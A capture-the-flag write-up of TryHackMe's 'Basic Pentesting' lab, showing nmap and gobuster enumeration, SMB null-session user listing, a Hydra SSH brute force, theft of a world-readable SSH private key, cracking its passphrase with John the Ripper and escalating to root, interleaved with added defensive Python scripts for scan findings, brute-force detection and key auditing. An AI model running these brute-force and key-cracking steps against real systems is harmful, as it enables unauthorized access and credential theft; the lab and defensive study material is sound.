Basic Pentesting
Link to the challenge: https://tryhackme.com/room/basicpentestingjt
Contents
- Reconnaissance
- Web server enumeration
- Finding login credentials
- Privilege escalation
- Cracking the key passphrase
Reconnaissance
# First scan to find the open ports
nmap -T4 10.10.53.133
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 14:01 CET
Nmap scan report for 10.10.53.133
Host is up (0.053s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds
# Second scan to gather more information
nmap -T4 10.10.53.133 -p 22,80,139,445,8009,8080 -A
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-08 14:02 CET
Nmap scan report for 10.10.53.133
Host is up (0.035s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h40m04s, deviation: 2h53m13s, median: 4s
| smb2-time:
| date: 2025-02-08T13:02:59
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2025-02-08T08:02:59-05:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 32.58 ms 10.11.0.1
2 33.31 ms 10.10.53.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.14 seconds
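Reading the same scan from the defender's side: the Python script below is an added example, not part of the original writeup, that parses nmap's normal output (the port table and the smb-security-mode host script shown above) and turns the facts it contains into hardening findings. The sample input is a constructed, trimmed copy of that output; the Samba options it names (server signing, map to guest, restrict anonymous) are real smb.conf parameters.

```python
import re
import sys

# Constructed sample: a trimmed copy of the port table and host-script lines from the scan.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.7
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
"""

# "22/tcp open ssh OpenSSH 7.2p2 ..." -> port, proto, state, service, free-text version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(text):
    """Return one dict per port line of nmap's normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports


def parse_smb_security(text):
    """Return the key/value pairs of the smb-security-mode host script block."""
    result, in_block = {}, False
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("| smb-security-mode:"):
            in_block = True
            continue
        if not in_block:
            continue
        if not s.startswith("|"):
            break
        body = s.lstrip("|_ ")          # "|_ message_signing: x" -> "message_signing: x"
        if ":" in body:
            key, value = body.split(":", 1)
            result[key.strip()] = value.strip()
        if s.startswith("|_"):          # "|_" is the last line of a script block
            break
    return result


def findings(text):
    """Turn the parsed scan facts into defender-side findings with the matching fix."""
    open_ports = {p["port"]: p for p in parse_ports(text) if p["state"] == "open"}
    smb = parse_smb_security(text)
    out = []
    if 8009 in open_ports:
        out.append("AJP connector (8009/tcp) reachable from the network: bind it to "
                   "127.0.0.1 or disable it unless a front-end proxy needs it")
    if 8080 in open_ports and "Tomcat" in open_ports[8080]["version"]:
        out.append("Tomcat exposed on 8080/tcp: restrict who can reach it and keep it patched")
    if 139 in open_ports or 445 in open_ports:
        if smb.get("message_signing", "").startswith("disabled"):
            out.append("SMB signing disabled: set 'server signing = mandatory' in smb.conf")
        if smb.get("account_used") == "guest":
            out.append("SMB accepted a guest session: set 'map to guest = Never' and "
                       "'restrict anonymous = 2' in smb.conf")
    return out


if __name__ == "__main__":
    # Usage: python3 nmap_findings.py scan.txt   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP
    for p in parse_ports(text):
        print(f"{p['port']}/{p['proto']} {p['service']}: {p['version']}")
    for f in findings(text):
        print("[!]", f)
```

Run it against a saved `nmap -A` output (`nmap -oN scan.txt ...`); the version strings are reported as an inventory only, and the findings are limited to facts the scan actually states.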
Web server enumeration
gobuster dir -u http://10.10.53.133/ -w /usr/share/wordlists/dirb/common.txt -r
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.53.133/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/[...redacted...] (Status: 200) [Size: 1131]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 300]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
There we find the developers' notes:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
As well as a note addressed to a user whose name begins with J, who appears to have a weak password.
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
Finding login credentials
We know that an SMB service is running. We try to gather more information with the enum4linux tool.
enum4linux -U -r 10.10.53.133
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 8 17:26:51 2025
==========================
| Target Information |
==========================
Target ........... 10.10.53.133
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.53.133 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
=====================================
| Session Check on 10.10.53.133 |
=====================================
[+] Server 10.10.53.133 allows sessions using username '', password ''
===========================================
| Getting domain SID for 10.10.53.133 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=============================
| Users on 10.10.53.133 |
=============================
Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 876.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 879.
Use of uninitialized value $users in print at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 892.
Use of uninitialized value $users in pattern match (m//) at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 894.
=======================================================================
| Users on 10.10.53.133 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
[...redacted for brevity...]
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\[...redacted...] (Local User)
S-1-22-1-1001 Unix User\[...redacted...] (Local User)
We then run Hydra against the SSH service to find user J's password.
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.53.133
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-08 17:31:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://10.10.53.133:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344222 to do in 1358:22h, 16 active
[STATUS] 128.33 tries/min, 385 tries in 00:03h, 14344013 to do in 1862:52h, 16 active
[22][ssh] host: 10.10.53.133 login: [...redacted...] password: [...redacted...]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-08 17:38:28
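What the Hydra run above looks like from the target's side: the Python example below is added here and is not part of the original writeup. It parses sshd lines in the syslog format Ubuntu 16.04 writes to /var/log/auth.log, raises an alert when one source address accumulates repeated failures inside a short window, and raises a second, more important alert if a login from that address later succeeds. The log lines, host name, PIDs and source addresses are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the syslog format Ubuntu 16.04 writes to /var/log/auth.log.
# Host name, timestamps, PIDs and source addresses are made up for this example.
SAMPLE_AUTH_LOG = """\
Feb  8 17:31:57 basic2 sshd[1201]: Failed password for jan from 10.11.1.5 port 40122 ssh2
Feb  8 17:31:57 basic2 sshd[1203]: Failed password for jan from 10.11.1.5 port 40124 ssh2
Feb  8 17:31:58 basic2 sshd[1205]: Failed password for jan from 10.11.1.5 port 40126 ssh2
Feb  8 17:31:58 basic2 sshd[1207]: Failed password for invalid user admin from 10.11.1.5 port 40128 ssh2
Feb  8 17:31:59 basic2 sshd[1209]: Failed password for jan from 10.11.1.5 port 40130 ssh2
Feb  8 17:32:00 basic2 sshd[1211]: Failed password for jan from 10.11.1.5 port 40132 ssh2
Feb  8 17:38:27 basic2 sshd[1890]: Accepted password for jan from 10.11.1.5 port 41002 ssh2
Feb  8 17:40:10 basic2 sshd[1950]: Failed password for kay from 192.168.56.102 port 50100 ssh2
"""

# syslog timestamp, host, "sshd[pid]:", outcome, optional "invalid user", user, source address
LINE_RE = re.compile(
    r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+"
)


def parse_events(text):
    """Extract time, outcome, user and source from sshd password-auth lines; other lines are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            # syslog timestamps carry no year; strptime defaults it, which is fine for
            # differences inside one log file that does not cross New Year
            events.append({"time": datetime.strptime(m.group(1), "%b %d %H:%M:%S"),
                           "outcome": m.group(2), "user": m.group(3), "src": m.group(4)})
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding-window detector.

    Emits ("burst", src, count) the first time a source reaches `threshold` failed
    logins inside `window_seconds`, and ("success_after_burst", src, user) for any
    later successful login from that source, which is the event worth paging on.
    """
    alerts, flagged = [], set()
    recent = defaultdict(list)               # src -> failure timestamps inside the window
    for ev in events:
        src = ev["src"]
        if ev["outcome"] == "Failed":
            recent[src].append(ev["time"])
            recent[src] = [t for t in recent[src]
                           if (ev["time"] - t).total_seconds() <= window_seconds]
            if len(recent[src]) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("burst", src, len(recent[src])))
        elif ev["outcome"] == "Accepted" and src in flagged:
            alerts.append(("success_after_burst", src, ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)):
        print(alert)
```

On the server itself the same attack is blunted by `PasswordAuthentication no` and a low `MaxAuthTries` in sshd_config, or by fail2ban reading these very lines; the detector above is the part that tells you it happened and whether it worked.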
Privilege escalation
We know there is another user on the machine. Browsing their home directory, we find that we can retrieve their SSH private key. This user is all the more interesting because they belong to the sudo group.
cd /home/[...redacted...]/
ls -hAl
total 40K
[...redacted for brevity...]
drwxr-xr-x 2 [...redacted...] [...redacted...] 4.0K Apr 23 2018 .ssh
-rw-r--r-- 1 [...redacted...] [...redacted...] 0 Apr 17 2018 .sudo_as_admin_successful
[...redacted for brevity...]
cd .ssh/
ls -hAl
total 12K
-rw-rw-r-- 1 [...redacted...] [...redacted...] 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 [...redacted...] [...redacted...] 3.3K Apr 19 2018 id_rsa
-rw-r--r-- 1 [...redacted...] [...redacted...] 771 Apr 19 2018 id_rsa.pub
groups [...redacted...]
[...redacted...] : [...redacted...] adm cdrom sudo dip plugdev lxd lpadmin sambashare
We retrieve the key and try to use it, but it is protected by a passphrase:
# Retrieve the key onto our machine
scp [...redacted...]@10.10.53.133:/home/[...redacted...]/.ssh/id_rsa ./
[...redacted...]@10.10.53.133's password:
id_rsa 100% 3326 1.9MB/s 00:00
# Check that the file arrived and look at its permissions
ls -hl
total 4.0K
-rw-r--r-- 1 root root 3.3K Feb 8 17:56 id_rsa
# Set the correct permissions on the private key
chmod 600 id_rsa
# Connection attempt
ssh -i id_rsa [...redacted...]@10.10.53.133
Enter passphrase for key 'id_rsa':
Cracking the key passphrase
# Convert the file into a hash that John the Ripper can process
ssh2john id_rsa > hash.txt
# Crack the hash
john --format=SSH hash.txt -w=/usr/share/wordlists/rockyou.txt
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[...redacted...] (id_rsa)
1g 0:00:00:10 DONE (2025-02-08 18:13) 0.09803g/s 1406Kp/s 1406Kc/s 1406KC/s *7¡Vamos!
Session completed.
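Two things made this key crackable: it was readable by every local user (mode 644 in the listing above), and john reports a cost of "MD5/AES" with an iteration count of 1, i.e. the legacy PEM encryption whose passphrase-to-key derivation is a single MD5 pass. The Python audit below is an added example, not part of the writeup, that checks both points on a private key file: its permission bits, and whether it carries the legacy PEM headers or the OpenSSH format with a bcrypt KDF, whose round count is read from the file header. Both sample keys are constructed; the OpenSSH one is a syntactically valid header with dummy key material, not a usable key.

```python
import base64
import os
import stat
import struct
import tempfile

MAGIC = b"openssh-key-v1\0"

# Constructed legacy-format key: the Proc-Type/DEK-Info headers are what the old
# PEM encryption looks like; the body is dummy data, not real key material.
SAMPLE_LEGACY_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF

QUJDREVGR0hJSktMTU5PUA==
-----END RSA PRIVATE KEY-----
"""


def _sshstr(b):
    """Encode bytes as an SSH wire-format string: uint32 big-endian length, then data."""
    return struct.pack(">I", len(b)) + b


def _read_string(buf, off):
    """Decode an SSH wire-format string at offset `off`; return (data, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def make_sample_openssh_key(rounds):
    """Build a constructed OpenSSH-format key with a bcrypt KDF header and dummy key
    material (enough for the header audit; it is not a usable key)."""
    kdfopts = _sshstr(b"\x00" * 16) + struct.pack(">I", rounds)   # string salt, uint32 rounds
    blob = (MAGIC + _sshstr(b"aes256-ctr") + _sshstr(b"bcrypt") + _sshstr(kdfopts)
            + struct.pack(">I", 1) + _sshstr(b"") + _sshstr(b"\x00" * 32))
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def audit_key_text(text):
    """Report how a private key is protected: format, encrypted or not, KDF and rounds."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":                       # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "encrypted": cipher != b"none",
                "kdf": kdf.decode(), "rounds": rounds, "weak_kdf": False}
    # Legacy PEM: encryption is signalled by headers, and the key is derived from the
    # passphrase with a single MD5 pass (john's "MD5/AES", iteration count 1).
    encrypted = any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines)
    return {"format": "pem", "encrypted": encrypted, "kdf": "md5" if encrypted else "none",
            "rounds": 1 if encrypted else 0, "weak_kdf": encrypted}


def audit_key_file(path, min_rounds=16):
    """Combine the permission check and the format check into a list of findings."""
    with open(path) as f:
        info = audit_key_text(f.read())
    mode = stat.S_IMODE(os.stat(path).st_mode)
    findings = []
    if mode & (stat.S_IRGRP | stat.S_IROTH | stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"mode {mode:o}: readable by other users, chmod 600")
    if not info["encrypted"]:
        findings.append("no passphrase: a copy of the file is enough to log in")
    elif info["weak_kdf"]:
        findings.append("legacy PEM encryption (one MD5 round): run ssh-keygen -p -a 100 -f <key>")
    elif info["rounds"] < min_rounds:
        findings.append(f"bcrypt rounds={info['rounds']}: raise with ssh-keygen -p -a 100 -f <key>")
    info["findings"] = findings
    return info


def demo():
    """Write both constructed keys to a temp dir, the legacy one with the mode 644 seen in
    the listing above, audit them and return {name: audit result}."""
    d = tempfile.mkdtemp()
    results = {}
    for name, text, mode in (("legacy_644", SAMPLE_LEGACY_PEM, 0o644),
                             ("openssh_600", make_sample_openssh_key(100), 0o600)):
        path = os.path.join(d, name)
        with open(path, "w") as f:
            f.write(text)
        os.chmod(path, mode)
        results[name] = audit_key_file(path)
    return results


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info["findings"] or ["ok"])
```

`ssh-keygen -p -a 100 -f id_rsa` re-encrypts an existing key with the bcrypt KDF at 100 rounds (on OpenSSH releases older than 7.8 add `-o` to get the new format, which newer releases write by default); combined with `chmod 600` that removes both weaknesses the walkthrough relied on.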
ssh -i id_rsa kay@10.10.53.133
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
ls -hal
total 48K
[...redacted for brevity...]
-rw------- 1 [...redacted...] [...redacted...] 57 Apr 23 2018 pass.bak
[...redacted for brevity...]
cat pass.bak
here[...redacted...]$$
We now have root access on the machine, and we find a message from the box's author inviting us to dig deeper and find other ways of exploring it.
sudo su -
[sudo] password for [...redacted...]:
id
uid=0(root) gid=0(root) groups=0(root)
ls -hl
total 4.0K
-rw-r--r-- 1 root root 1017 Apr 23 2018 flag.txt
cat flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!
If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at josiah@vt.edu. If you've got questions or feedback, please reach
out to me.
Happy hacking!